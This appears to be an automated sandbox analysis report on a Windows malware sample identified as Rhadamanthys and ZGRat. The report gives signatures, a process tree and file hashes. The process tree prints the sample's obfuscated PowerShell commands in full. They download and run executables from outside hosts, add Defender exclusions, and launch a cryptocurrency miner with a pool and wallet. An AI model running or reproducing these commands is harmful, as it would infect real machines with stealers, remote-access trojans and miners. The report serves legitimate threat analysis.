Analysis
-
max time kernel
612s -
max time network
629s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
-
submitted
20-12-2023 01:43
General
-
Target
0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe
-
Size
210KB
-
MD5
8e84fa4f3e50e2bdc357c348b923a8b4
-
SHA1
8ccc6b05df9cd2ab9275e2848a997176b3cd41c8
-
SHA256
0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1
-
SHA512
cab0b936c6834068a94d55a7c3172b3b27766ddd41d5422ec2e4b1f2c0f39fa12f1258c4dc5483f061b635976ce398b91d274fbab812b64657ea3eb06e5dc81c
-
SSDEEP
3072:NWEv+PTBTYm7BsOzKSU2pr1RJoutgYdNC1W:NWEvMlTb7GyrLJoShdNn
Malware Config
Extracted
http://bratiop.ru/asdfg.exe
http://bratiop.ru/asdfg.exe
Signatures
-
Detect ZGRat V1 30 IoCs
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Blocklisted process makes network request 5 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Suspicious use of SetThreadContext 11 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe"C:\Users\Admin\AppData\Local\Temp\0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D13A.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwygvqhixbak $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwygvqhixbak rwfxnse $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rwfxnse;fwygvqhixbak vdgyxptwz $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0Yg==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);vdgyxptwz $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\m1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xrfhvszbucp $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xrfhvszbucp qtpbfnvsjwme $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|qtpbfnvsjwme;xrfhvszbucp pedzf $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);pedzf $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\icw.exe"C:\Users\Public\icw.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\icw.exeC:\Users\Public\icw.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 4487⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 5007⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exeC:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ufnxmjsqb $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ufnxmjsqb mwsfev $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|mwsfev;ufnxmjsqb zwncmhjoglapft $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0TQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);zwncmhjoglapft $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xksqtuiezpom $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xksqtuiezpom najxgsmhtuwd $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|najxgsmhtuwd;xksqtuiezpom lubwzta $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);lubwzta $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL luhqmxbnvrt $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;luhqmxbnvrt pkzotxjl $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzotxjl;luhqmxbnvrt aiykpt $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs1aQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);aiykpt $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b2a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qjezygpm $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qjezygpm tykqrhcaxivo $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tykqrhcaxivo;qjezygpm yqvjfrouc $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);yqvjfrouc $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\D13A.tmp\patch.exepatch.exe3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4924 -ip 49241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4924 -ip 49241⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Detail\ygzhpwoyo\StringIds.exeC:\Users\Admin\AppData\Local\Detail\ygzhpwoyo\StringIds.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Detail\ygzhpwoyo\StringIds.exeC:\Users\Admin\AppData\Local\Detail\ygzhpwoyo\StringIds.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\akugwl.exeC:\Users\Admin\AppData\Local\Temp\akugwl.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\akugwl.exeC:\Users\Admin\AppData\Local\Temp\akugwl.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQBcAFMAdQBwAHAAbwByAHQAcwBEAHkAbgBhAG0AaQBjAFAAYQByAHQAaQB0AGkAbwBuAHMALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AZQBzAHMAYQBnAGUAXABTAHUAcABwAG8AcgB0AHMARAB5AG4AYQBtAGkAYwBQAGEAcgB0AGkAdABpAG8AbgBzAC4AZQB4AGUA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=505⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
885KB
MD50ea11d5050bccac4305a57931d723f68
SHA1bf7bce111d6359ada624a7c781957ba2cb26b66b
SHA2568f8f2cde6e6757cd7a87a277846e4c62115bd3f0fc6c97fdf63be1bb3c51712b
SHA5129fac9dd771dec64c724473964e7b480f564ad3ad1393989d65cc4a75bd26208b3b6d7d6ec004f35890ef263dbd215b11f219469b3f34e21b99cb2d158433f2fd
-
Filesize
1KB
MD5b8418ed2a59189acecef48efbc2eba7d
SHA114f53c898215122eb28ab41c94697e63a63ff925
SHA256e17b3fd5b8c8ac454e8fa71e04fd011f27bfab2de07e0319be1d32e916f37a84
SHA5121ffcaa0e0e5507fdbdb06eb08be210aa3482e587f76be82f2d35ba43a218e3b8c8e8c2aa37ab9d211ebdc7be7896cc53f6064b0694500cb235ef6a720ed9d25d
-
Filesize
2KB
MD59e125123bfeef529d4bbc40045e5abf0
SHA1d0c65298116989744839c5d82d8d48219d71c4ef
SHA256e1a570f26d69c6725ba84b617d9c77fcfd81d82d1a90a920215cafde7820443b
SHA5126e6011330c870de08d0f4a0f20bf215f76e3ba122dd836214f472b8a41d10bb7f7bf48ecc1d0ce7efcb0dd6f74d5b64fec399b39978e1a1e469ab1af5eea1470
-
Filesize
1KB
MD52cd056bf2cb201147013842c7e70bd08
SHA1f01f285a3c8121db0bd64d58055838afbd8f44bd
SHA256c2c2e2f3f8dcf510d1e8e328f3f62ed24f84a8215d70afbb617555ba61e38188
SHA5122b48b94968755359603c3726c1ae6eefe0b93b6d7ca82db4cc79f991701b82c01de68e6dcb82677e7b79207a907b88c3cc94f9285bebaf87a3d4fdb06eba8b75
-
Filesize
2KB
MD51a2e5e35da46d56789cbaea1c8e2d094
SHA10be9a7f3614a60cce7ebc4aacfd55d87cf34e0f8
SHA2560f977384b6ebe2ba0f51ed25b44599ad33bac5dfce64478461f7a8c725bbba0c
SHA512cf4ea5b403bcc750bcf3d96fe7330d12315ef582521a6e70386156027d0e5761dd6ff15785ae16f28381bdda6719e3cbc99c1427d8d98feee03fd924c464c162
-
Filesize
60KB
MD50a9da256ffcfe42119c7a351e5eaaa9c
SHA1c992b8e18cfc24faee739511beb5094189806177
SHA256f4750e5af8c84626318382887c9c17e6555eff006af7d7e88cadd562ab2ee8ed
SHA512451f4d470fe938a7c71d340f0711a9d1cb98f542138bd95584244471fa5f31beba8274699be1e497742ce91182dc9e308ca2d9ce3d004174a8228cca4c118672
-
Filesize
19KB
MD58c7bcae1075b664d99f011006bff4aad
SHA19f9e219cfe7e3002e9f864b08f89d9dbc4a78710
SHA25628a71a0d3c17042dcc7040bdc1e988b65850a1d68b2bffe398f1b9ff225d6116
SHA512288ed4019af8b8c7653f95aaf8ef3c0426231d818e5a442e63cee365199b1f020dd7f3e87317d010b55f430adac43736282abc7bf9a279241d66e9bea64e0e44
-
Filesize
17KB
MD5363809e82a55a7722d478f95f4b3377b
SHA11d8cd0708ae9ec7f331112a6be9d300858b95d32
SHA256fbac6d9796c295cbb801d69a00a22d504c4531650e5085dcaabe814c752aaa86
SHA512d41d1c9cbacd0ca8e11038187eb16cf056cdda220179a7c9e5a07b51ebeb277588f58e3f95b1261a58f4f9581c47c75e91961247fc3304f6d5a5f4c58608814b
-
Filesize
19KB
MD510d3fc6b05e41374da4172845882bc65
SHA17bee6566d65577fc500945500b8597191d00484f
SHA256870b1336b2e18be80cc8600521b0495d498997c0295768bcf0ffa5cf208ea624
SHA5127232efc3565d938a7ec3f809a188c01de6d5eba905c2abde1738f83e1deb7bd41b921a8bd309be80592e9a5a85fd3daf0ce79a7aadb133f3720c405383d3fc0d
-
Filesize
19KB
MD562567bb2efffc9fccfbd0bf29a11954e
SHA10cffb301535f3bdcd4128367ed817d3f5be76646
SHA25648109d5755486dba57893beb4969cb0722c3e2d5e69186f687b7365cd069cc1c
